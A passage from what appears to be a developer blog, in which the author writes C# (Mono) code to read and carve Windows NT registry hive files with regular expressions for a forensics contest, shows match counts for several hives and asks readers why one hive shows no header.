   Console.WriteLine(blah);
   
   i += length; //we are done.
  }
  else i+= word; //debugging purposes
 }
}

If you notice, however, my code is not complete. I am starting with the most useful stuff first and moving on that way. A more complete class will keep the key name length in a local variable and use that instead of bs.Length when reading the key name later. With the current implementation, I read in too many bytes and grab some extra key headers :-/. You could create properties that are privately set and publicly get'able and set the properties to their respective values, to make it truly object oriented.

Another thing to point out is i is being incremented by the length read each time. It isn't arbitrary. This way next go around we are at the offset we need to be at.

One thing I look forward to implementing is lazy loading of parents and children. If you would like to test this, class, you can see my previous post on initially reading and deciphering the windows registry in C#. Just use this in your for loop instead:


foreach (Match mx in nk.Matches (d)) {

 all++;
 NodeKey key = new NodeKey(mx.Value);
}

Analyzing the Windows NT registry without advapi32.dll using Mono (PoC)

2011-01-05T12:10:00.000-06:00

I have been doing some challenges for a contest and one requires analyzing a set of Windows NT registry hives. Regedit really sucks (though it does run in wine). I decided it would be more fun to write a small library that can read the registry hives without relying on p/invoke and advapi32.dll on Windows. I have some small code that carves out the data I need, though I am running into a problem on the software hive supplied. Maybe someone can point me in the right direction.

A lot of my information came from this text file which I found, and have updated some with information that I found missing.

As far as I can tell, there are 6 data types to be carved out of the hives. regf file headers, hbin blocks, node keys, value keys, and lf/h (lh on XP) blocks. There are also security keys (with a sk header) within node keys. The following regex's should carve out the data from the registry files so you may parse out the information you need.


Regex regf = new Regex (@"^regf.{508}");
Regex nk = new Regex (@"nk[\x2c|\x20]\x00.{7}\x01.{64}");
Regex vk = new Regex (@"vk.{3}\x00\x00[\x00|\x80].{64}");
Regex hbin = new Regex (@"hbin.{4}\x00\x10\x00\x00.{8}");
Regex lf = new Regex (@".{4}l[f|h][0-65535].{8}"); //lf or lh on winxp

But in order to search the hive, we need to read it in. This isn't very efficient, and I am aware of this. It works.


using (FileStream fs = File.OpenRead (path)) {
 var data = new byte[checked((int)fs.Length)];
 int i = 0;
 int read;
     
 using (var ms = new MemoryStream (checked((int)fs.Length))) {
      
  while ((read = fs.Read (data, 0, data.Length)) > 0) {
   ms.Write (data, 0, read);
   i += read;
  }
      
  byte[] hive = ms.ToArray ();
  char[] cList = new char[fs.Length];
      
  i = 0;
  foreach (byte b in hive)
   cList[i++] = (char)b;
      
         string d = new string (cList);
 
      
  int all = 0;
      
  foreach (Match mx in lf.Matches (d)) { //you can change out the regex you want here.
   byte[] bb = new byte[mx.Value.Length];
   char[] cb = new char[mx.Value.Length];
       
   for (int k = 0; k < mx.Value.Length; k++) {
    bb[k] = (byte)mx.Value[k];
    cb[k] = (char)bb[k];
    
   }
   
   all++;
   
   //Console.WriteLine (new string (cb));
  }
  
  Console.WriteLine (all.ToString ());
  all = 0;
 }
}

Basically, we read in the hive into a MemoryStream, convert the stream into a byte array, move that into a char array from which we create a string to search for the regexs in. Yes, we store 4 copies of the registry in memory. I am sure there are better ways to do this.

Then we loop through each match and count them. Of course we are working with binary streams, so if you choose to write the data carved out to the console, it will look like random data (to the untrained eye at least).

Running through all the hives supplied, I get this output:



/home/bperry/SAM
nk[\x2c|\x20]\x00.{7}\x01.{64}
47
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
36
hbin.{4}\x00\x10\x00\x00.{8}
6
^regf.{508}
1

/home/bperry/software
nk[\x2c|\x20]\x00.{7}\x01.{64}
43147
.{4}l[f|h][0-65535].{8}
6
vk.{3}\x00\x00[\x00|\x80].{64}
54708
hbin.{4}\x00\x10\x00\x00.{8}
2917
^regf.{508}
0

/home/bperry/system
nk[\x2c|\x20]\x00.{7}\x01.{64}
11189
.{4}l[f|h][0-65535].{8}
4
vk.{3}\x00\x00[\x00|\x80].{64}
21926
hbin.{4}\x00\x10\x00\x00.{8}
1121
^regf.{508}
1

/home/bperry/default
nk[\x2c|\x20]\x00.{7}\x01.{64}
554
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
1014
hbin.{4}\x00\x10\x00\x00.{8}
58
^regf.{508}
1

/home/bperry/SECURITY
nk[\x2c|\x20]\x00.{7}\x01.{64}
220
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
147
hbin.{4}\x00\x10\x00\x00.{8}
10
^regf.{508}
1

The number printed after the regex is the number of matches found. The data is fully carved out, so the only thing left is to break it apart to get the relevant data. If you will notice however, software reports 0 regf file headers, and I cannot figure out why. Any thoughts?